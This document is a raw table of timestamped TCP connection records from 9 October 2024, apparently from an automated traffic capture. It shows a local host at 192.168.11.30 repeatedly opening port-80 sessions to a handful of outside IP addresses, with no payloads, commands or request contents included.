                                                                                                                                                                Oct 9, 2024 13:03:28.767455101 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.767903090 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.767980099 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.768176079 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:30.084979057 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.103444099 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.294542074 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.294763088 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.305915117 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.496937990 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.497334957 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.497348070 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.497548103 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:32.818746090 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:33.836929083 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.034148932 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.034320116 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.045150042 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.045167923 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.242383957 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242439985 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242644072 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242721081 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242785931 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242822886 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242948055 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.439995050 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:36.573997974 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:36.786999941 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:36.787180901 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:36.801964998 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:37.015023947 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:37.015255928 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:37.015343904 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:37.015594006 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:37.022665024 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:37.235522985 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:42.249380112 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:42.348927975 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:42.349131107 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:42.360498905 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:42.460026026 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:43.863149881 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:44.003813028 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:44.881449938 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:44.980911016 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:44.981146097 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:44.990825891 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:45.090197086 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:45.093775988 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:45.093940973 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:45.389717102 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:45.389941931 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:46.503103971 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:46.602507114 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.521140099 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.620538950 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.620758057 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.632370949 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.632419109 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.731801033 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.731909037 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.732072115 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.733336926 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.733484030 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:49.143177032 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:49.242691040 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:50.161571026 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:50.260806084 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:50.260961056 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:50.267708063 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:50.366997957 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.267218113 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.267265081 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.267544031 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.269839048 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.271073103 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.271260023 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.580028057 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.679292917 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:56.390140057 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:56.490200996 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:56.490422010 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:56.501013994 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:56.601069927 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:58.016103983 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:58.159037113 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.034228086 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.133482933 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.133733034 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.144063950 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.243441105 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.246757984 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.246982098 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.528657913 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.528887033 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:00.656125069 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:00.755340099 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:01.674319029 CEST4984480192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:01.773730993 CEST80498443.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:01.773973942 CEST4984480192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:01.785245895 CEST4984480192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:01.785267115 CEST4984480192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:01.884820938 CEST80498443.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:01.884833097 CEST80498443.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:01.884917021 CEST80498443.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:02.785880089 CEST80498443.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:02.786125898 CEST4984480192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:03.296170950 CEST4984480192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:03.395756006 CEST80498443.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:04.314297915 CEST4984580192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:04.413664103 CEST80498453.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:04.413943052 CEST4984580192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:04.420248985 CEST4984580192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:04.519563913 CEST80498453.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:04.522494078 CEST80498453.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:04.522516966 CEST80498453.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:04.522902012 CEST4984580192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:04.525146008 CEST4984580192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:04.530396938 CEST80498453.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:04.530647993 CEST4984580192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:04.624464035 CEST80498453.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.650798082 CEST4984680192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:09.745204926 CEST8049846199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.745479107 CEST4984680192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:09.755691051 CEST4984680192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:09.850243092 CEST8049846199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.858261108 CEST8049846199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.858278990 CEST8049846199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.858295918 CEST8049846199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.858458996 CEST4984680192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:09.866204977 CEST8049846199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.866470098 CEST4984680192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:11.263111115 CEST4984680192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:12.281433105 CEST4984780192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:12.375755072 CEST8049847199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:12.375922918 CEST4984780192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:12.385987997 CEST4984780192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:12.480051041 CEST8049847199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:12.487884045 CEST8049847199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:12.487898111 CEST8049847199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:12.487972975 CEST8049847199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:12.488198996 CEST4984780192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:12.491915941 CEST8049847199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:12.492100000 CEST4984780192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:13.887548923 CEST4984780192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:14.905683041 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:15.000385046 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.000611067 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:15.011703968 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:15.011753082 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:15.106560946 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.106575966 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.106667042 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.114428043 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.114444017 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.114459038 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.114725113 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:15.118825912 CEST8049848199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:15.119048119 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:16.527605057 CEST4984880192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.545870066 CEST4984980192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.640377045 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:17.640734911 CEST4984980192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.648009062 CEST4984980192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.742327929 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:17.749865055 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:17.749948025 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:17.749962091 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:17.750385046 CEST4984980192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.752782106 CEST4984980192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.753851891 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:17.754174948 CEST4984980192.168.11.30199.59.243.227
                                                                                                                                                                Oct 9, 2024 13:04:17.846955061 CEST8049849199.59.243.227192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:23.017158031 CEST4985080192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:23.127585888 CEST804985045.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:23.127846003 CEST4985080192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:23.238090992 CEST804985045.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:23.238399029 CEST4985080192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:23.348422050 CEST804985045.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:23.355555058 CEST804985045.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:23.355844975 CEST804985045.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:23.356158018 CEST4985080192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:24.650682926 CEST4985080192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:25.668979883 CEST4985180192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:25.778983116 CEST804985145.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:25.779298067 CEST4985180192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:25.889473915 CEST804985145.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:25.889766932 CEST4985180192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:26.000099897 CEST804985145.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:26.005774021 CEST804985145.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:26.006032944 CEST804985145.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:26.006262064 CEST4985180192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:27.290774107 CEST4985180192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:28.309026003 CEST4985280192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:28.418610096 CEST804985245.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:28.418798923 CEST4985280192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:28.529035091 CEST804985245.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:28.529401064 CEST4985280192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:28.529447079 CEST4985280192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:28.639642954 CEST804985245.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:28.639755011 CEST804985245.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:28.650324106 CEST804985245.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:28.650677919 CEST804985245.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:28.650892019 CEST4985280192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:29.930824995 CEST4985280192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:30.949243069 CEST4985380192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:31.059107065 CEST804985345.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:31.059294939 CEST4985380192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:31.169576883 CEST804985345.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:31.169725895 CEST4985380192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:31.279897928 CEST804985345.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:31.285075903 CEST804985345.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:31.285234928 CEST804985345.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:31.285706997 CEST4985380192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:31.288089037 CEST4985380192.168.11.3045.56.219.238
                                                                                                                                                                Oct 9, 2024 13:04:31.398231983 CEST804985345.56.219.238192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:36.465250015 CEST4985480192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:36.626482010 CEST8049854162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:36.626830101 CEST4985480192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:36.637264967 CEST4985480192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:36.798300982 CEST8049854162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:36.818108082 CEST8049854162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:36.818125963 CEST8049854162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:36.818285942 CEST4985480192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:38.147774935 CEST4985480192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:39.166218042 CEST4985580192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:39.326507092 CEST8049855162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:39.326973915 CEST4985580192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:39.338570118 CEST4985580192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:39.500017881 CEST8049855162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:39.509960890 CEST8049855162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:39.510037899 CEST8049855162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:39.510377884 CEST4985580192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:40.850131989 CEST4985580192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:41.868089914 CEST4985680192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:42.029289007 CEST8049856162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:42.029484034 CEST4985680192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:42.039190054 CEST4985680192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:42.039239883 CEST4985680192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:42.199579954 CEST8049856162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:42.199851036 CEST8049856162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:42.211950064 CEST8049856162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:42.211963892 CEST8049856162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:42.212184906 CEST4985680192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:43.552608013 CEST4985680192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:44.573167086 CEST4985780192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:44.731405020 CEST8049857162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:44.731703043 CEST4985780192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:44.737786055 CEST4985780192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:44.895742893 CEST8049857162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:44.910360098 CEST8049857162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:44.910375118 CEST8049857162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:44.910690069 CEST4985780192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:44.912916899 CEST4985780192.168.11.30162.0.238.43
                                                                                                                                                                Oct 9, 2024 13:04:45.070831060 CEST8049857162.0.238.43192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.030472040 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.124524117 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.124696970 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.135679007 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.230092049 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524318933 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524389029 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524513960 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524524927 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524537086 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.524765015 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.524766922 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524986029 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:51.644546986 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.663394928 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.758172989 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:52.758332014 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.769571066 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.864331007 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654623032 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654690027 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654738903 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654752970 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654865026 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:53.654987097 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:53.655494928 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.655648947 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:54.284616947 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.303138971 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.398612976 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.398755074 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.408767939 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.408817053 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.503839016 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.504622936 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.504635096 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775000095 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775073051 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775221109 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775304079 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775315046 CEST804986023.227.38.74192.168.11.30
